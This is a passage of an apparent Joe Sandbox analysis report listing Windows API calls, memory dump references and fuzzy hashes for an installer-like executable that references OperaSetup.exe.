                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                              • Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                              • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                                                                                                              • Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                              • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                                                                                                              APIs
                                                                                                                                              • FreeLibrary.KERNEL32(?,76F93420,00000000,76F92EE0,00403CB6,004D1000,00403BB5,?,?,00000008,0000000A,0000000C), ref: 00403CF9
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00403D00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1100898210-0
                                                                                                                                              • Opcode ID: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                              • Instruction ID: 6cc7235c82e409e594193dc40a4abc0356c386f753d5776fe34d96f63476a0b8
                                                                                                                                              • Opcode Fuzzy Hash: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                              • Instruction Fuzzy Hash: 2DE012334151305BD6225F59FE0575ABB68BF45F22F05C52FE940BB2A18BB85C424FD8
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                              • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                              • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                                                                                              • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                              • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                              • Instruction ID: 83b49fe15d4d51a1c27b4b8da2ab4689423c6710ab607d501633f61f971848cf
                                                                                                                                              • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                              • Instruction Fuzzy Hash: 63D0C972504220BFC2102728AE0889BBB55DB552717028A35FCA9A22B0CB314C6A86A4
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                              • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                              • Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
                                                                                                                                              • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                              • Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                              • Opcode ID: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
                                                                                                                                              • Instruction ID: 93454ec2f84d486dd0eb46c633a3a61ffb1fb8fcaaff07e214acfe86ea83ea04
                                                                                                                                              • Opcode Fuzzy Hash: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
                                                                                                                                              • Instruction Fuzzy Hash: 33E0863150471496D5206F7CAE4D9853B185F41335765C327F038F21F0C738D95A5AAD
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,0042158D,0041E6F0,0040359E,0041E6F0,0042158D,004266F0,00004000,?,00000000,004033C8,00000004), ref: 00406258
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                              • Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
                                                                                                                                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                              • Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,004266F0,0041E6F0,0040361A,00008001,00008001,0040351E,004266F0,00004000,?,00000000,004033C8), ref: 00406229
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                              • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                                                                                                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                              • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExW.KERNEL32(00000000,0043A728,00000000,00000000,?,?,00000000,?,0040659D,?,0043A728,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,00000000), ref: 00406533
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                              • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                              • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                                                                                                              • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                              • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                              • Opcode ID: c37c337817e1dfb9061d04ab007e7fa4af6351da24787f6127d7a9909fa94f94
                                                                                                                                              • Instruction ID: 39264c5466c0a9c1499aa9251a9428ad8f628c8ba18ccf0a3388d06020594a91
                                                                                                                                              • Opcode Fuzzy Hash: c37c337817e1dfb9061d04ab007e7fa4af6351da24787f6127d7a9909fa94f94
                                                                                                                                              • Instruction Fuzzy Hash: ABF0FC31904111DBEB20BBA55AC94AE7260CF00318F10413FE202B21D5CABC4D41A65E
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405910
                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                                                                                                                • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405A5F
                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405AAE
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405AF3
                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405B27
                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405B88
                                                                                                                                              • EmptyClipboard.USER32 ref: 00405B8E
                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                                                                                                              • CloseClipboard.USER32 ref: 00405BE9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                              • String ID: H'D${
                                                                                                                                              • API String ID: 590372296-3538427676
                                                                                                                                              • Opcode ID: 570833faf529d1e68f6cd33d533d4b4f7643f176c4e3a8f9582153ded90dbe4e
                                                                                                                                              • Instruction ID: a946544cda80648ae215d749a1304cfc675a42e6d6c1d5f97ef9608d1157b9e3
                                                                                                                                              • Opcode Fuzzy Hash: 570833faf529d1e68f6cd33d533d4b4f7643f176c4e3a8f9582153ded90dbe4e
                                                                                                                                              • Instruction Fuzzy Hash: 0DB16770800608FFDF11AFA0DD859AE3B78EB48354F10413AFA45BA1A0D7785A41DF69
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                                                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
